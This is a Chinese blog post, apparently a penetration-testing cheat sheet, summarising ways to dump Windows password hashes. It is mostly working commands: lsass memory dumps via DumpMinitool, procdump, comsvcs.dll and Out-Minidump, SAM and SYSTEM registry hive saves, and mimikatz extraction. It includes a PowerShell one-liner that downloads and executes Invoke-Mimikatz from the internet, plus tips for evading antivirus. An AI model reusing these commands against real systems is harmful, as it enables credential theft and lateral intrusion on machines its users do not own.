dump hash常见方法总结

dump hash 常见方式总结

DumpMinitool dump hash

在这里插入图片描述

dump lsass进程

DumpMinitool.exe --file 1.txt --processId 948 --dumpType Full

--file 保存文件名为1.txt 规避一下杀软
--processId  lsass.exe 进程号

杀软无拦截

查看1.dmp

sekurlsa::minidump "1.dmp"

sekurlsa::logonpasswords

在这里插入图片描述

注册表读取hash

reg save HKLM\SYSTEM C:\windows\temp\Sys.hiv
reg save HKLM\SAM C:\windows\temp\Sam.hiv

privilege::debug
sekurlsa::logonpasswords
# mimikatz运行解密命令
lsadump::sam /sam:Sam.hiv /system:Sys.hiv

mimikatz 读取内存中的密码

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" exit

procdump lsass.exe进程

可以在任务管理器中对着lsass.exe进程  create dump file  dump下来得文件使用mimikatz解开

mimikatz命令
(使用以下命令针对 lsass.dmp 文件启动 mimikatz alpha:)
privilege::debug

sekurlsa::minidump C:\Users\PunchMan\Desktop\lsass.dmp

sekurlsa::logonPasswords full
or
sekurlsa::logonPasswords

在这里插入图片描述

在这里插入图片描述

使用Powershell远程加载mimikatz

powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds

在这里插入图片描述

  • 本地调用Mimikatz读密码
    PowerShell因为在此系统中禁止执行脚本
    用管理员权限打开powershell并执行 set-ExecutionPolicy RemoteSigned即可.

mimikataz 读取转存后得文件

mimikatz命令读取密码
mimikatz.exe privilege::debug 
cd 到转存的文件目录
sekurlsa::logonpasswords full exit

comsvcs.dll 需要管理员权限得powershell

powershell 执行

.\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 624 C:\temp\lsass.dmp full

此时我们想到,把这个 comsvcs.dll 复制到其他随意目录并取个新的名字,叫test.dll绕过杀软

在这里插入图片描述

在这里插入图片描述

PowerSploit* 脚本 Out-MiniDump.ps1(截止2022.2.8有效)

使用 PowerSploit 的Out-MiniDump模块,PowerSploit是一个基于 Powershell 的渗透工具包,可以选择创建进程的完整内存转储。工具项目地址:https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Out-Minidump.ps1

Import-Module .\Out-Minidump.ps1
Get-Process lsass | Out-Minidump

在这里插入图片描述

blob/master/Exfiltration/Out-Minidump.ps1

Import-Module .\Out-Minidump.ps1
Get-Process lsass | Out-Minidump

在这里插入图片描述

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值